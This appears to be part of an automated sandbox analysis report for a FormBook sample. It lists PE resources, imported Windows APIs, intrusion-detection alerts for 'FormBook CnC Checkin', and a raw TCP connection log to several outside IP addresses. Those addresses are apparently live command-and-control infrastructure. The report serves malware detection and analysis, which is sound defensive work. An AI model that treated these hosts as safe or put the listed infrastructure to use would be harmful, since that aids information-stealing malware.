                                                                    .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xcf7b80x564d3data1.0003281554551602
                                                                    RT_GROUP_ICON0x125c8c0x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x125d040x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x125d180x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x125d2c0x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x125d400xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x125e1c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                    DLLImport
                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-05T09:43:27.768718+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84970881.2.196.1980TCP
                                                                    2024-12-05T09:43:53.418925+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849712103.249.106.9180TCP
                                                                    2024-12-05T09:44:08.368003+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84971713.248.169.4880TCP
                                                                    2024-12-05T09:44:23.579928+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849721195.110.124.13380TCP
                                                                    2024-12-05T09:44:38.396713+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849725209.74.77.10780TCP
                                                                    2024-12-05T09:44:53.167690+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972984.32.84.3280TCP
                                                                    2024-12-05T09:45:08.519235+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849733154.88.22.10580TCP
                                                                    2024-12-05T09:45:23.962628+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84973785.159.66.9380TCP
                                                                    2024-12-05T09:45:38.915975+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849741199.59.243.22780TCP
                                                                    2024-12-05T09:45:53.979627+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974591.226.30.380TCP
                                                                    2024-12-05T09:46:08.717861+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974913.248.169.4880TCP
                                                                    2024-12-05T09:46:23.882892+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849753185.27.134.14480TCP
                                                                    2024-12-05T09:46:39.481719+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975785.159.66.9380TCP
                                                                    2024-12-05T09:46:54.675852+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849761154.23.184.20780TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 09:43:26.355663061 CET4970880192.168.2.881.2.196.19
                                                                    Dec 5, 2024 09:43:26.475475073 CET804970881.2.196.19192.168.2.8
                                                                    Dec 5, 2024 09:43:26.475711107 CET4970880192.168.2.881.2.196.19
                                                                    Dec 5, 2024 09:43:26.486388922 CET4970880192.168.2.881.2.196.19
                                                                    Dec 5, 2024 09:43:26.606167078 CET804970881.2.196.19192.168.2.8
                                                                    Dec 5, 2024 09:43:27.768527031 CET804970881.2.196.19192.168.2.8
                                                                    Dec 5, 2024 09:43:27.768580914 CET804970881.2.196.19192.168.2.8
                                                                    Dec 5, 2024 09:43:27.768718004 CET4970880192.168.2.881.2.196.19
                                                                    Dec 5, 2024 09:43:27.771792889 CET4970880192.168.2.881.2.196.19
                                                                    Dec 5, 2024 09:43:27.891601086 CET804970881.2.196.19192.168.2.8
                                                                    Dec 5, 2024 09:43:43.693286896 CET4970980192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:43.813318968 CET8049709103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:43.813437939 CET4970980192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:43.860748053 CET4970980192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:43.980715990 CET8049709103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:45.332259893 CET8049709103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:45.332403898 CET8049709103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:45.332498074 CET4970980192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:45.366667986 CET4970980192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:46.451616049 CET4971080192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:46.572009087 CET8049710103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:46.572135925 CET4971080192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:46.595088005 CET4971080192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:46.714920044 CET8049710103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:48.095791101 CET8049710103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:48.095808029 CET8049710103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:48.096131086 CET4971080192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:48.100990057 CET4971080192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:49.119926929 CET4971180192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:49.239769936 CET8049711103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:49.239901066 CET4971180192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:49.255536079 CET4971180192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:49.403062105 CET8049711103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:49.403074980 CET8049711103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:50.757087946 CET4971180192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:50.877268076 CET8049711103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:50.877366066 CET4971180192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:51.776277065 CET4971280192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:51.896044016 CET8049712103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:51.896153927 CET4971280192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:51.906380892 CET4971280192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:52.026213884 CET8049712103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:53.418690920 CET8049712103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:53.418773890 CET8049712103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:53.418925047 CET4971280192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:53.421638012 CET4971280192.168.2.8103.249.106.91
                                                                    Dec 5, 2024 09:43:53.541441917 CET8049712103.249.106.91192.168.2.8
                                                                    Dec 5, 2024 09:43:59.147979975 CET4971480192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:43:59.267859936 CET804971413.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:43:59.267936945 CET4971480192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:43:59.283620119 CET4971480192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:43:59.403367043 CET804971413.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:00.371089935 CET804971413.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:00.371181011 CET4971480192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:00.788448095 CET4971480192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:00.909460068 CET804971413.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:01.814019918 CET4971580192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:01.933870077 CET804971513.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:01.934032917 CET4971580192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:01.950649977 CET4971580192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:02.070560932 CET804971513.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:03.031696081 CET804971513.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:03.031770945 CET4971580192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:03.460660934 CET4971580192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:03.580354929 CET804971513.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:04.479528904 CET4971680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:04.599391937 CET804971613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:04.599541903 CET4971680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:04.614829063 CET4971680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:04.734668970 CET804971613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:04.734684944 CET804971613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:05.697489023 CET804971613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:05.700297117 CET4971680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:06.116702080 CET4971680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:06.236558914 CET804971613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:07.144720078 CET4971780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:07.264529943 CET804971713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:07.264688969 CET4971780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:07.274946928 CET4971780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:07.394690037 CET804971713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:08.367788076 CET804971713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:08.367913008 CET804971713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:08.368002892 CET4971780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:08.370749950 CET4971780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:44:08.490629911 CET804971713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:44:14.139519930 CET4971880192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:14.259577036 CET8049718195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:14.259691954 CET4971880192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:14.284224987 CET4971880192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:14.404027939 CET8049718195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:15.567703962 CET8049718195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:15.567941904 CET8049718195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:15.568028927 CET4971880192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:15.788552999 CET4971880192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:16.814081907 CET4971980192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:16.933959007 CET8049719195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:16.934108973 CET4971980192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:16.955539942 CET4971980192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:17.075462103 CET8049719195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:18.244738102 CET8049719195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:18.245094061 CET8049719195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:18.245151997 CET4971980192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:18.460371971 CET4971980192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:19.479538918 CET4972080192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:19.600256920 CET8049720195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:19.600517035 CET4972080192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:19.623923063 CET4972080192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:19.743901968 CET8049720195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:19.743921041 CET8049720195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:21.019366980 CET8049720195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:21.019788980 CET8049720195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:21.019844055 CET4972080192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:21.133482933 CET4972080192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:22.151458025 CET4972180192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:22.271254063 CET8049721195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:22.271332026 CET4972180192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:22.282315969 CET4972180192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:22.401998043 CET8049721195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:23.579639912 CET8049721195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:23.579852104 CET8049721195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:23.579927921 CET4972180192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:23.582647085 CET4972180192.168.2.8195.110.124.133
                                                                    Dec 5, 2024 09:44:23.702343941 CET8049721195.110.124.133192.168.2.8
                                                                    Dec 5, 2024 09:44:29.012798071 CET4972280192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:29.132561922 CET8049722209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:29.132673979 CET4972280192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:29.149302959 CET4972280192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:29.269021034 CET8049722209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:30.374099970 CET8049722209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:30.374228954 CET8049722209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:30.374278069 CET4972280192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:30.663481951 CET4972280192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:31.682835102 CET4972380192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:31.802752018 CET8049723209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:31.806427002 CET4972380192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:31.821647882 CET4972380192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:31.941421986 CET8049723209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:33.044850111 CET8049723209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:33.044879913 CET8049723209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:33.046377897 CET4972380192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:33.338285923 CET4972380192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:34.354648113 CET4972480192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:34.475380898 CET8049724209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:34.475483894 CET4972480192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:34.491868019 CET4972480192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:34.611713886 CET8049724209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:34.611805916 CET8049724209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:35.795859098 CET8049724209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:35.795972109 CET8049724209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:35.796072006 CET4972480192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:36.015460968 CET4972480192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:37.030878067 CET4972580192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:37.150639057 CET8049725209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:37.158415079 CET4972580192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:37.166523933 CET4972580192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:37.286308050 CET8049725209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:38.396351099 CET8049725209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:38.396667004 CET8049725209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:38.396713018 CET4972580192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:38.401261091 CET4972580192.168.2.8209.74.77.107
                                                                    Dec 5, 2024 09:44:38.523139000 CET8049725209.74.77.107192.168.2.8
                                                                    Dec 5, 2024 09:44:43.942353964 CET4972680192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:44.062194109 CET804972684.32.84.32192.168.2.8
